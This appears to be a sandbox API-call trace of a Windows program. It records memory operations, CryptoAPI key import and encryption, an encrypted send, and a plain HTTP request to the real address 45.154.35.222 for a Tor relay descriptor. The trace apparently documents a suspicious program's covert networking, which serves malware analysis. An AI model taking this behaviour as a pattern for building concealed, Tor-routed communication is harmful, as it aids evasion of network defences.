(_Block=0x3d80120) [0155.304] free (_Block=0x3e22470) [0155.304] free (_Block=0x3d80080) [0155.304] free (_Block=0x3d802b0) [0155.304] free (_Block=0x6066d8) [0155.304] free (_Block=0x3d80350) [0155.304] free (_Block=0x3e223e0) [0155.304] free (_Block=0x3648e30) [0155.304] free (_Block=0x60ddf8) [0155.304] free (_Block=0x60b380) [0155.304] free (_Block=0x3648c68) [0155.304] free (_Block=0x3d801e8) [0155.304] free (_Block=0x60ebe8) [0155.304] free (_Block=0x60ec38) [0155.305] free (_Block=0x3e22080) [0155.305] free (_Block=0x3d80238) [0155.305] free (_Block=0x3648ef0) [0155.305] free (_Block=0x3d80198) [0155.305] free (_Block=0x60eb98) [0155.305] free (_Block=0x60e968) [0155.305] free (_Block=0x3e22230) [0155.305] free (_Block=0x3d800d0) [0155.305] free (_Block=0x3f65460) [0155.305] free (_Block=0x3d800a8) [0155.305] free (_Block=0x60ec88) [0155.305] free (_Block=0x60e9b8) [0155.305] free (_Block=0x3624b80) [0155.305] free (_Block=0x3f65480) [0155.305] free (_Block=0x3d802d8) [0155.305] free (_Block=0x3d80148) [0155.305] free (_Block=0x60eaa8) [0155.305] free (_Block=0x60e878) [0155.305] free (_Block=0x3648f08) [0155.305] free (_Block=0x3d80288) [0155.305] free (_Block=0x3def010) [0155.305] free (_Block=0x3f65280) [0155.305] free (_Block=0x3d803f0) [0155.305] free (_Block=0x3e220c8) [0155.305] free (_Block=0x3f652c0) [0155.305] free (_Block=0x3f651e0) [0155.305] free (_Block=0x3f65320) [0155.305] free (_Block=0x3f65300) [0155.305] free (_Block=0x3f65340) [0155.305] free (_Block=0x3f65360) [0155.305] free (_Block=0x3f653c0) [0155.306] free (_Block=0x3648d40) [0155.306] free (_Block=0x3d801c0) [0155.306] free (_Block=0x3f65380) [0155.306] free (_Block=0x60bb78) [0155.306] free (_Block=0x3f653e0) [0155.306] free (_Block=0x3d80260) [0155.306] free (_Block=0x60e788) [0155.306] free (_Block=0x60e918) [0155.306] free (_Block=0x3624b10) [0155.306] free (_Block=0x3f654a0) [0155.306] free (_Block=0x3691270) [0155.306] free (_Block=0x3f69ce0) [0155.306] malloc (_Size=0x10) returned 0x3648c80 [0155.306] free (_Block=0x0) [0155.306] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648c80 | out: pbBuffer=0x3648c80) returned 1 [0155.306] malloc (_Size=0x40) returned 0x3e22110 [0155.306] free (_Block=0x0) [0155.306] malloc (_Size=0x104) returned 0x3d81910 [0155.306] free (_Block=0x3e22110) [0155.306] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x605a18, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f434, pcbStructInfo=0x316f40c | out: pvStructInfo=0x316f434, pcbStructInfo=0x316f40c) returned 1 [0155.306] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f434, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f430 | out: phKey=0x316f430*=0x3e10d8) returned 1 [0155.307] malloc (_Size=0x80) returned 0x609fa0 [0155.307] free (_Block=0x0) [0155.307] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x609fa0*, pdwDataLen=0x316f400*=0x56, dwBufLen=0x80 | out: pbData=0x609fa0*, pdwDataLen=0x316f400*=0x80) returned 1 [0155.307] CryptDestroyKey (hKey=0x3e10d8) returned 1 [0155.307] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f4d0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f4cc | out: phKey=0x316f4cc*=0x3e0b58) returned 1 [0155.307] CryptSetKeyParam (hKey=0x3e0b58, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0155.307] malloc (_Size=0x3a) returned 0x3e22668 [0155.307] free (_Block=0x0) [0155.307] CryptEncrypt (in: hKey=0x3e0b58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10, dwBufLen=0x10 | out: pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10) returned 1 [0155.307] CryptEncrypt (in: hKey=0x3e0b58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10, dwBufLen=0x10 | out: pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10) returned 1 [0155.307] CryptEncrypt (in: hKey=0x3e0b58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10, dwBufLen=0x10 | out: pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10) returned 1 [0155.307] CryptEncrypt (in: hKey=0x3e0b58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10, dwBufLen=0x10 | out: pbData=0x316f3e0*, pdwDataLen=0x316f344*=0x10) returned 1 [0155.307] CryptDestroyKey (hKey=0x3e0b58) returned 1 [0155.308] malloc (_Size=0x100) returned 0x3df04b8 [0155.308] free (_Block=0x0) [0155.308] free (_Block=0x0) [0155.308] free (_Block=0x3e22668) [0155.308] free (_Block=0x609fa0) [0155.308] free (_Block=0x3d81910) [0155.308] free (_Block=0x3648c80) [0155.308] malloc (_Size=0xba) returned 0x3594f20 [0155.308] free (_Block=0x0) [0155.308] malloc (_Size=0x202) returned 0x3d81e60 [0155.308] free (_Block=0x0) [0155.308] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f51c, MessageSeqNo=0x0 | out: pMessage=0x316f51c) returned 0x0 [0155.308] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0155.309] free (_Block=0x3d81e60) [0155.309] free (_Block=0x3594f20) [0155.309] free (_Block=0x3df04b8) [0155.309] GetTickCount () returned 0x1167a87 [0155.309] malloc (_Size=0x10) returned 0x3648ea8 [0155.309] free (_Block=0x0) [0155.309] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ea8*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.309] free (_Block=0x3648ea8) [0155.309] GetTickCount () returned 0x1167a87 [0155.309] malloc (_Size=0x10) returned 0x3648e00 [0155.309] free (_Block=0x0) [0155.309] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e00*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0155.474] free (_Block=0x3648e00) [0155.474] GetTickCount () returned 0x1167b32 [0155.474] free (_Block=0x3f4c0c8) [0155.474] malloc (_Size=0x10) returned 0x3648e30 [0155.474] free (_Block=0x0) [0155.474] malloc (_Size=0x10) returned 0x3648f20 [0155.474] free (_Block=0x0) [0155.474] malloc (_Size=0x50) returned 0x3d9ab98 [0155.474] free (_Block=0x3648f20) [0155.474] malloc (_Size=0x150) returned 0x3d81168 [0155.474] free (_Block=0x3d9ab98) [0155.474] malloc (_Size=0x550) returned 0x3691270 [0155.474] free (_Block=0x3d81168) [0155.474] malloc (_Size=0x1550) returned 0x36929c0 [0155.474] free (_Block=0x3691270) [0155.474] malloc (_Size=0x5550) returned 0x348c1b8 [0155.475] free (_Block=0x36929c0) [0155.475] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x316f62c | out: pbBuffer=0x316f62c) returned 1 [0155.475] free (_Block=0x348c1b8) [0155.475] free (_Block=0x3648e30) [0155.475] free (_Block=0x0) [0155.475] free (_Block=0x0) [0155.475] SetEvent (hEvent=0x3a4) returned 1 [0155.475] malloc (_Size=0x34) returned 0x3624630 [0155.475] malloc (_Size=0x338) returned 0x3df00e0 [0155.475] malloc (_Size=0x80) returned 0x6099c8 [0155.475] free (_Block=0x0) [0155.475] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x6099c8 | out: pbBuffer=0x6099c8) returned 1 [0155.475] CryptImportKey (in: hProv=0x3e57b0, pbData=0x316f248, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x316f244 | out: phKey=0x316f244*=0x3e0b58) returned 1 [0155.478] CryptExportKey (in: hKey=0x3e0b58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x316eea4, pdwDataLen=0x316ee8c | out: pbData=0x316eea4*, pdwDataLen=0x316ee8c*=0x90) returned 1 [0155.478] free (_Block=0x6099c8) [0155.478] CryptBinaryToStringA (in: pbBinary=0x3dfd268, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x0, pcchString=0x316f54c | out: pszString=0x0, pcchString=0x316f54c) returned 1 [0155.478] malloc (_Size=0x29) returned 0x3624bb8 [0155.478] free (_Block=0x0) [0155.478] CryptBinaryToStringA (in: pbBinary=0x3dfd268, cbBinary=0x14, dwFlags=0x4000000c, pszString=0x3624bb8, pcchString=0x316f54c | out: pszString="4839bd15b8e8bbda5cdf304ecd7516d104cdc7f4", pcchString=0x316f54c) returned 1 [0155.478] malloc (_Size=0x10) returned 0x3648d70 [0155.478] free (_Block=0x0) [0155.478] malloc (_Size=0x10) returned 0x3648c98 [0155.478] free (_Block=0x0) [0155.478] malloc (_Size=0x38) returned 0x3624330 [0155.478] free (_Block=0x3648c98) [0155.479] malloc (_Size=0x8) returned 0x3f4c098 [0155.479] free (_Block=0x0) [0155.479] malloc (_Size=0x10) returned 0x3648c68 [0155.479] free (_Block=0x0) [0155.479] malloc (_Size=0x50) returned 0x3d9ad50 [0155.479] free (_Block=0x3648c68) [0155.479] malloc (_Size=0x150) returned 0x3d81010 [0155.479] free (_Block=0x3d9ad50) [0155.479] malloc (_Size=0x550) returned 0x3691270 [0155.479] free (_Block=0x3d81010) [0155.479] malloc (_Size=0x1550) returned 0x36929c0 [0155.479] free (_Block=0x3691270) [0155.479] malloc (_Size=0x5550) returned 0x348c1b8 [0155.479] free (_Block=0x36929c0) [0155.479] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x4, pbBuffer=0x316f474 | out: pbBuffer=0x316f474) returned 1 [0155.479] free (_Block=0x348c1b8) [0155.479] free (_Block=0x0) [0155.479] free (_Block=0x0) [0155.479] free (_Block=0x3f4c098) [0155.479] inet_ntoa (in=0xde239a2d) returned="45.154.35.222" [0155.479] malloc (_Size=0xe) returned 0x3648e60 [0155.480] free (_Block=0x0) [0155.480] gethostbyname (name="45.154.35.222") returned 0x42bbb8*(h_name="45.154.35.222", h_aliases=0x42bbc8*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x42bbcc*=([0]="45.154.35.222")) [0155.480] htons (hostshort=0x50) returned 0x5000 [0155.480] socket (af=2, type=1, protocol=6) returned 0x380 [0155.480] connect (s=0x380, name=0x316f450*(sa_family=2, sin_port=0x50, sin_addr="45.154.35.222"), namelen=16) returned 0 [0155.528] _vscprintf (_Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f418) returned 93 [0155.528] malloc (_Size=0x5e) returned 0x60e018 [0155.528] free (_Block=0x0) [0155.528] vsprintf_s (in: _DstBuf=0x60e018, _SizeInBytes=0x5e, _Format="GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", _ArgList=0x316f418 | out: _DstBuf="GET /tor/server/fp/4839bd15b8e8bbda5cdf304ecd7516d104cdc7f4 HTTP/1.0\r\nHost: 45.154.35.222\r\n\r\n") returned 93 [0155.528] send (s=0x380, buf=0x60e018*, len=94, flags=0) returned 94 [0155.528] recv (in: s=0x380, buf=0x316e414, len=4096, flags=0 | out: buf=0x316e414*) returned 2000 [0155.584] malloc (_Size=0x7d1) returned 0x3def010 [0155.585] free (_Block=0x0) [0155.585] recv (in: s=0x380, buf=0x316e414, len=4096, flags=0 | out: buf=0x316e414*) returned 846 [0155.585] malloc (_Size=0xbb9) returned 0x3f68010 [0155.585] free (_Block=0x3def010) [0155.585] recv (in: s=0x380, buf=0x316e414, len=4096, flags=0 | out: buf=0x316e414) returned 0 [0155.585] closesocket (s=0x380) returned 0 [0155.586] malloc (_Size=0xa68) returned 0x60cdc0 [0155.586] free (_Block=0x0) [0155.586] free (_Block=0x3f68010) [0155.586] free (_Block=0x60e018) [0155.586] closesocket (s=0xffffffff) returned -1 [0155.586] free (_Block=0x0) [0155.586] free (_Block=0x3648e60) [0155.586] free (_Block=0x0) [0155.586] free (_Block=0x3624330) [0155.586] free (_Block=0x3648d70) [0155.586] free (_Block=0x3624bb8) [0155.586] malloc (_Size=0xa68) returned 0x3f68010 [0155.586] free (_Block=0x0) [0155.586] malloc (_Size=0x32) returned 0x3624670 [0155.586] free (_Block=0x0) [0155.586] malloc (_Size=0x40) returned 0x3e22308 [0155.586] free (_Block=0x0) [0155.586] free (_Block=0x0) [0155.586] memchr (_Buf=0x3f68042, _Val=10, _MaxCount=0xa35) returned 0x3f68052 [0155.586] malloc (_Size=0x11) returned 0x3f651e0 [0155.586] free (_Block=0x0) [0155.586] free (_Block=0x0) [0155.586] memchr (_Buf=0x3f68053, _Val=10, _MaxCount=0xa24) returned 0x3f6806f [0155.586] malloc (_Size=0x1d) returned 0x3d803c8 [0155.587] free (_Block=0x0) [0155.587] free (_Block=0x0) [0155.587] memchr (_Buf=0x3f68070, _Val=10, _MaxCount=0xa07) returned 0x3f680b0 [0155.587] malloc (_Size=0x41) returned 0x60e8c8 [0155.587] free (_Block=0x0) [0155.587] free (_Block=0x0) [0155.587] memchr (_Buf=0x3f680b1, _Val=10, _MaxCount=0x9c6) returned 0x3f680f1 [0155.587] malloc (_Size=0x41) returned 0x60ebe8 [0155.587] free (_Block=0x0) [0155.587] malloc (_Size=0x140) returned 0x3dd3c08 [0155.587] free (_Block=0x3e22308) [0155.587] free (_Block=0x0) [0155.587] memchr (_Buf=0x3f680f2, _Val=10, _MaxCount=0x985) returned 0x3f6812e [0155.587] malloc (_Size=0x3d) returned 0x3e22308 [0155.587] free (_Block=0x0) [0155.587] free (_Block=0x0) [0155.587] memchr (_Buf=0x3f6812f, _Val=10, _MaxCount=0x948) returned 0x3f68149 [0155.587] malloc (_Size=0x1b) returned 0x3d802d8 [0155.587] free (_Block=0x0) [0155.587] free (_Block=0x0) [0155.587] memchr (_Buf=0x3f6814a, _Val=10, _MaxCount=0x92d) returned 0x3f68188 [0155.587] malloc (_Size=0x3f) returned 0x3e224b8 [0155.587] free (_Block=0x0) [0155.587] free (_Block=0x0) [0155.587] memchr (_Buf=0x3f68189, _Val=10, _MaxCount=0x8ee) returned 0x3f681a6 [0155.587] malloc (_Size=0x1e) returned 0x3d80300 [0155.587] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f681a7, _Val=10, _MaxCount=0x8d0) returned 0x3f6822f [0155.588] malloc (_Size=0x89) returned 0x6066d8 [0155.588] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f68230, _Val=10, _MaxCount=0x847) returned 0x3f6824d [0155.588] malloc (_Size=0x1e) returned 0x3d802b0 [0155.588] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f6824e, _Val=10, _MaxCount=0x829) returned 0x3f6828b [0155.588] malloc (_Size=0x3e) returned 0x3e22350 [0155.588] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f6828c, _Val=10, _MaxCount=0x7eb) returned 0x3f6829a [0155.588] malloc (_Size=0xf) returned 0x3648f08 [0155.588] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f6829b, _Val=10, _MaxCount=0x7dc) returned 0x3f682c3 [0155.588] malloc (_Size=0x29) returned 0x3624ad8 [0155.588] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f682c4, _Val=10, _MaxCount=0x7b3) returned 0x3f6832a [0155.588] malloc (_Size=0x67) returned 0x60af20 [0155.588] free (_Block=0x0) [0155.588] free (_Block=0x0) [0155.588] memchr (_Buf=0x3f6832b, _Val=10, _MaxCount=0x74c) returned 0x3f68334 [0155.588] malloc (_Size=0xa) returned 0x3648e00 [0155.589] free (_Block=0x0) [0155.589] free (_Block=0x0) [0155.589] memchr (_Buf=0x3f68335, _Val=10, _MaxCount=0x742) returned 0x3f68353 [0155.589] malloc (_Size=0x1f) returned 0x3d803f0 [0155.589] free (_Block=0x0) [0155.589] free (_Block=0x0) [0155.589] memchr (_Buf=0x3f68354, _Val=10, _MaxCount=0x723) returned 0x3f68394 [0155.589] malloc (_Size=0x41) returned 0x60eaf8 [0155.589] free (_Block=0x0) [0155.589] free (_Block=0x0) [0155.589] memchr (_Buf=0x3f68395, _Val=10, _MaxCount=0x6e2) returned 0x3f683d5 [0155.589] malloc (_Size=0x41) returned 0x60eb48 [0155.589] free (_Block=0x0) [0155.589] free (_Block=0x0) [0155.589] memchr (_Buf=0x3f683d6, _Val=10, _MaxCount=0x6a1) returned 0x3f68412 [0155.589] malloc (_Size=0x3d) returned 0x3e22470 [0155.589] free (_Block=0x0) [0155.589] free (_Block=0x0) [0155.589] memchr (_Buf=0x3f68413, _Val=10, _MaxCount=0x664) returned 0x3f6842f [0155.589] malloc (_Size=0x1d) returned 0x3d80120 [0155.589] free (_Block=0x0) [0155.589] malloc (_Size=0x540) returned 0x3691270 [0155.589] free (_Block=0x3dd3c08) [0155.589] free (_Block=0x0) [0155.589] memchr (_Buf=0x3f68430, _Val=10, _MaxCount=0x647) returned 0x3f6843b [0155.589] malloc (_Size=0xc) returned 0x3648de8 [0155.589] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f6843c, _Val=10, _MaxCount=0x63b) returned 0x3f6845a [0155.590] malloc (_Size=0x1f) returned 0x3d80148 [0155.590] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f6845b, _Val=10, _MaxCount=0x61c) returned 0x3f6849b [0155.590] malloc (_Size=0x41) returned 0x60ed28 [0155.590] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f6849c, _Val=10, _MaxCount=0x5db) returned 0x3f684dc [0155.590] malloc (_Size=0x41) returned 0x60eb98 [0155.590] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f684dd, _Val=10, _MaxCount=0x59a) returned 0x3f68519 [0155.590] malloc (_Size=0x3d) returned 0x3e22038 [0155.590] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f6851a, _Val=10, _MaxCount=0x55d) returned 0x3f68536 [0155.590] malloc (_Size=0x1d) returned 0x3d80238 [0155.590] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f68537, _Val=10, _MaxCount=0x540) returned 0x3f6854a [0155.590] malloc (_Size=0x14) returned 0x3f65280 [0155.590] free (_Block=0x0) [0155.590] free (_Block=0x0) [0155.590] memchr (_Buf=0x3f6854b, _Val=10, _MaxCount=0x52c) returned 0x3f68564 [0155.590] malloc (_Size=0x1a) returned 0x3d80080 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.591] memchr (_Buf=0x3f68565, _Val=10, _MaxCount=0x512) returned 0x3f685a5 [0155.591] malloc (_Size=0x41) returned 0x60ed78 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.591] memchr (_Buf=0x3f685a6, _Val=10, _MaxCount=0x4d1) returned 0x3f685e6 [0155.591] malloc (_Size=0x41) returned 0x60edc8 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.591] memchr (_Buf=0x3f685e7, _Val=10, _MaxCount=0x490) returned 0x3f68613 [0155.591] malloc (_Size=0x2d) returned 0x3624838 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.591] memchr (_Buf=0x3f68614, _Val=10, _MaxCount=0x463) returned 0x3f6862b [0155.591] malloc (_Size=0x18) returned 0x3f65340 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.591] memchr (_Buf=0x3f6862c, _Val=10, _MaxCount=0x44b) returned 0x3f68646 [0155.591] malloc (_Size=0x1b) returned 0x3d80260 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.591] memchr (_Buf=0x3f68647, _Val=10, _MaxCount=0x430) returned 0x3f68663 [0155.591] malloc (_Size=0x1d) returned 0x3d80198 [0155.591] free (_Block=0x0) [0155.591] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f68664, _Val=10, _MaxCount=0x413) returned 0x3f686a4 [0155.592] malloc (_Size=0x41) returned 0x60ea08 [0155.592] free (_Block=0x0) [0155.592] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f686a5, _Val=10, _MaxCount=0x3d2) returned 0x3f686e5 [0155.592] malloc (_Size=0x41) returned 0x60ec38 [0155.592] free (_Block=0x0) [0155.592] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f686e6, _Val=10, _MaxCount=0x391) returned 0x3f686f2 [0155.592] malloc (_Size=0xd) returned 0x3648c80 [0155.592] free (_Block=0x0) [0155.592] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f686f3, _Val=10, _MaxCount=0x384) returned 0x3f6870d [0155.592] malloc (_Size=0x1b) returned 0x3d800a8 [0155.592] free (_Block=0x0) [0155.592] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f6870e, _Val=10, _MaxCount=0x369) returned 0x3f68720 [0155.592] malloc (_Size=0x13) returned 0x3f65480 [0155.592] free (_Block=0x0) [0155.592] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f68721, _Val=10, _MaxCount=0x356) returned 0x3f68761 [0155.592] malloc (_Size=0x41) returned 0x60e918 [0155.592] free (_Block=0x0) [0155.592] free (_Block=0x0) [0155.592] memchr (_Buf=0x3f68762, _Val=10, _MaxCount=0x315) returned 0x3f6879d [0155.592] malloc (_Size=0x3c) returned 0x3e22278 [0155.592] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f6879e, _Val=10, _MaxCount=0x2d9) returned 0x3f687b0 [0155.593] malloc (_Size=0x13) returned 0x3f654a0 [0155.593] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f687b1, _Val=10, _MaxCount=0x2c6) returned 0x3f687c8 [0155.593] malloc (_Size=0x18) returned 0x3f652c0 [0155.593] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f687c9, _Val=10, _MaxCount=0x2ae) returned 0x3f687dd [0155.593] malloc (_Size=0x15) returned 0x3f65300 [0155.593] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f687de, _Val=10, _MaxCount=0x299) returned 0x3f687f5 [0155.593] malloc (_Size=0x18) returned 0x3f65320 [0155.593] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f687f6, _Val=10, _MaxCount=0x281) returned 0x3f68809 [0155.593] malloc (_Size=0x14) returned 0x3f65140 [0155.593] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f6880a, _Val=10, _MaxCount=0x26d) returned 0x3f68820 [0155.593] malloc (_Size=0x17) returned 0x3f65360 [0155.593] free (_Block=0x0) [0155.593] free (_Block=0x0) [0155.593] memchr (_Buf=0x3f68821, _Val=10, _MaxCount=0x256) returned 0x3f68837 [0155.594] malloc (_Size=0x17) returned 0x3f65380 [0155.594] free (_Block=0x0) [0155.594] free (_Block=0x0) [0155.594] memchr (_Buf=0x3f68838, _Val=10, _MaxCount=0x23f) returned 0x3f68843 [0155.594] malloc (_Size=0xc) returned 0x3648f20 [0155.594] free (_Block=0x0) [0155.594] free (_Block=0x0) [0155.594] memchr (_Buf=0x3f68844, _Val=10, _MaxCount=0x233) returned 0x3f6884f [0155.594] malloc (_Size=0xc) returned 0x3648db8 [0155.594] free (_Block=0x0) [0155.594] free (_Block=0x0) [0155.594] memchr (_Buf=0x3f68850, _Val=10, _MaxCount=0x227) returned 0x3f6885b [0155.594] malloc (_Size=0xc) returned 0x3648da0 [0155.594] free (_Block=0x0) [0155.594] free (_Block=0x0) [0155.594] memchr (_Buf=0x3f6885c, _Val=10, _MaxCount=0x21b) returned 0x3f68868 [0155.594] malloc (_Size=0xd) returned 0x3648cc8 [0155.594] free (_Block=0x0) [0155.594] free (_Block=0x0) [0155.594] memchr (_Buf=0x3f68869, _Val=10, _MaxCount=0x20e) returned 0x3f68875 [0155.594] malloc (_Size=0xd) returned 0x3648e78 [0155.594] free (_Block=0x0) [0155.594] free (_Block=0x0) [0155.594] memchr (_Buf=0x3f68876, _Val=10, _MaxCount=0x201) returned 0x3f68883 [0155.594] malloc (_Size=0xe) returned 0x3648d70 [0155.594] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f68884, _Val=10, _MaxCount=0x1f3) returned 0x3f68891 [0155.595] malloc (_Size=0xe) returned 0x3648ed8 [0155.595] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f68892, _Val=10, _MaxCount=0x1e5) returned 0x3f6889f [0155.595] malloc (_Size=0xe) returned 0x3648d28 [0155.595] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f688a0, _Val=10, _MaxCount=0x1d7) returned 0x3f688ad [0155.595] malloc (_Size=0xe) returned 0x3648d58 [0155.595] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f688ae, _Val=10, _MaxCount=0x1c9) returned 0x3f688c0 [0155.595] malloc (_Size=0x13) returned 0x3f653c0 [0155.595] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f688c1, _Val=10, _MaxCount=0x1b6) returned 0x3f688ce [0155.595] malloc (_Size=0xe) returned 0x3648f38 [0155.595] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f688cf, _Val=10, _MaxCount=0x1a8) returned 0x3f688dc [0155.595] malloc (_Size=0xe) returned 0x3648e60 [0155.595] free (_Block=0x0) [0155.595] free (_Block=0x0) [0155.595] memchr (_Buf=0x3f688dd, _Val=10, _MaxCount=0x19a) returned 0x3f688eb [0155.595] malloc (_Size=0xf) returned 0x3648e90 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.596] memchr (_Buf=0x3f688ec, _Val=10, _MaxCount=0x18b) returned 0x3f688fa [0155.596] malloc (_Size=0xf) returned 0x3648c50 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.596] memchr (_Buf=0x3f688fb, _Val=10, _MaxCount=0x17c) returned 0x3f68905 [0155.596] malloc (_Size=0xb) returned 0x3648dd0 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.596] memchr (_Buf=0x3f68906, _Val=10, _MaxCount=0x171) returned 0x3f6891a [0155.596] malloc (_Size=0x15) returned 0x3f654c0 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.596] memchr (_Buf=0x3f6891b, _Val=10, _MaxCount=0x15c) returned 0x3f68984 [0155.596] malloc (_Size=0x6a) returned 0x60b6c8 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.596] memchr (_Buf=0x3f68985, _Val=10, _MaxCount=0xf2) returned 0x3f68995 [0155.596] malloc (_Size=0x11) returned 0x3f65440 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.596] memchr (_Buf=0x3f68996, _Val=10, _MaxCount=0xe1) returned 0x3f689af [0155.596] malloc (_Size=0x1a) returned 0x3d80350 [0155.596] free (_Block=0x0) [0155.596] free (_Block=0x0) [0155.597] memchr (_Buf=0x3f689b0, _Val=10, _MaxCount=0xc7) returned 0x3f689f0 [0155.597] malloc (_Size=0x41) returned 0x60e968 [0155.597] free (_Block=0x0) [0155.597] free (_Block=0x0) [0155.597] memchr (_Buf=0x3f689f1, _Val=10, _MaxCount=0x86) returned 0x3f68a31 [0155.597] malloc (_Size=0x41) returned 0x60ee18 [0155.597] free (_Block=0x0) [0155.597] free (_Block=0x0) [0155.597] memchr (_Buf=0x3f68a32, _Val=10, _MaxCount=0x45) returned 0x3f68a5e [0155.597] malloc (_Size=0x2d) returned 0x3624bb8 [0155.597] free (_Block=0x0) [0155.597] free (_Block=0x0) [0155.597] memchr (_Buf=0x3f68a5f, _Val=10, _MaxCount=0x18) returned 0x3f68a76 [0155.597] malloc (_Size=0x18) returned 0x3f65460 [0155.597] free (_Block=0x0) [0155.597] free (_Block=0x0) [0155.597] free (_Block=0x3f68010) [0155.597] memchr (_Buf=0x3624670, _Val=32, _MaxCount=0x31) returned 0x3624676 [0155.597] malloc (_Size=0x7) returned 0x3f4bf68 [0155.597] free (_Block=0x0) [0155.597] malloc (_Size=0x40) returned 0x3e222c0 [0155.597] free (_Block=0x0) [0155.597] free (_Block=0x0) [0155.597] memchr (_Buf=0x3624677, _Val=32, _MaxCount=0x2a) returned 0x3624687 [0155.597] malloc (_Size=0x11) returned 0x3f653e0 [0155.597] free (_Block=0x0) [0155.598] free (_Block=0x0) [0155.598] memchr (_Buf=0x3624688, _Val=32, _MaxCount=0x19) returned 0x3624695 [0155.598] malloc (_Size=0xe) returned 0x3648ec0 [0155.598] free (_Block=0x0) [0155.598] free (_Block=0x0) [0155.598] memchr (_Buf=0x3624696, _Val=32, _MaxCount=0xb) returned 0x362469a [0155.598] malloc (_Size=0x5) returned 0x3f4bf58 [0155.598] free (_Block=0x0) [0155.598] free (_Block=0x0) [0155.598] memchr (_Buf=0x362469b, _Val=32, _MaxCount=0x6) returned 0x362469c [0155.598] malloc (_Size=0x2) returned 0x3f4bff8 